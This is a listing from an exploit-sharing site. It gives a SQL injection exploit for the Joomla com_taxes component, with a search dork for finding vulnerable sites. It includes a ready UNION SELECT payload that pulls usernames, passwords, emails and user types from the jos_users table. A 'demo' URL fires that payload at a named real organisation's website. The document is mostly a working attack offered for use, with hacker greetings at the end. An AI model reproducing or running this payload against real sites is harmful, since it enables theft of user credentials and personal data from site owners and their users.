[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_taxes SQL Injection Vulnerability

Author
MR.SoOoFe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13976
Category
web applications
Date add
05-09-2010
Platform
php
======================================================
Joomla Component com_taxes SQL Injection Vulnerability
======================================================

==========================================================================
[x] ExpLoit Title : Joomla component com_taxes SQL injection Vulnerability
[x] Date          : 03 September 2010
[x] Author        : MR.SoOoFe
[x] home          : http://crazy-hack.com
[x] Tested on     : Microsoft Windows XP Professional Version 2002 Service Pack 2
[x] Dork          : inurl:com_taxes
==========================================================================
 
============================================================================================================
[x]Vulnerability:
http://www.site.com/index.php?option=com_taxes&id=[ ] <= Sqli
============================================================================================================

============================================================================================================
[x]exploit:
+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--
============================================================================================================

================================================================================================================================================
[+]demo:
http://www.burs.org.bw/index.php?option=com_taxes&id=-6+union+all+select+1,group_concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,6,7,8,9,10,11+from+jos_users--
================================================================================================================================================

============================================================================================
[O]Gr33t'z to: inj3ct0r.com
syntax error | indoushka | Karar alShaMi | JoKeR SQL | c4uR | Sudden_death 

============================================================================================
 
=====================
[x]Iraq,Samarra
=====================



#  0day.today [2024-11-16]  #